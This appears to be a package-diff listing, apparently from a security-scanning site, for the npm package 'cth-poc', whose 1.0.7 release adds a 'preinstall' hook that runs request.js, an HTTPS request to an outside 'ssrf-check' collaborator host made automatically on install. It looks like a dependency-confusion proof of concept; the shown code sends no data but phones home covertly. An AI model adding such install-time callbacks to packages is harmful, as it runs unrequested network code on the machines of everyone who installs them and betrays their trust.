cth-poc 1.0.5 → 1.0.7
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +2 -2
- package/request.js +2 -2
package/package.json
CHANGED
@@ -1,11 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "cth-poc",
|
3
|
-
"version": "1.0.
|
3
|
+
"version": "1.0.7",
|
4
4
|
"description": "",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
7
7
|
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
-
"
|
8
|
+
"preinstall": "node request.js"
|
9
9
|
},
|
10
10
|
"keywords": [],
|
11
11
|
"author": "",
|
package/request.js
CHANGED
@@ -1,9 +1,9 @@
|
|
1
1
|
const https = require('https');
|
2
2
|
|
3
3
|
const options = {
|
4
|
-
hostname: '
|
4
|
+
hostname: 'ac1ae4a3-2131-40c6-be46-6a941fa50800.ssrf-check.wix.com', // Ganti dengan domain yang sesuai
|
5
5
|
port: 443, // Port HTTPS umum adalah 443
|
6
|
-
path: '/
|
6
|
+
path: '/collaborator', // Ganti dengan path yang sesuai
|
7
7
|
method: 'GET', // Metode HTTP, bisa GET, POST, dll.
|
8
8
|
// headers: {} // Anda bisa menambahkan header kustom jika diperlukan
|
9
9
|
};
|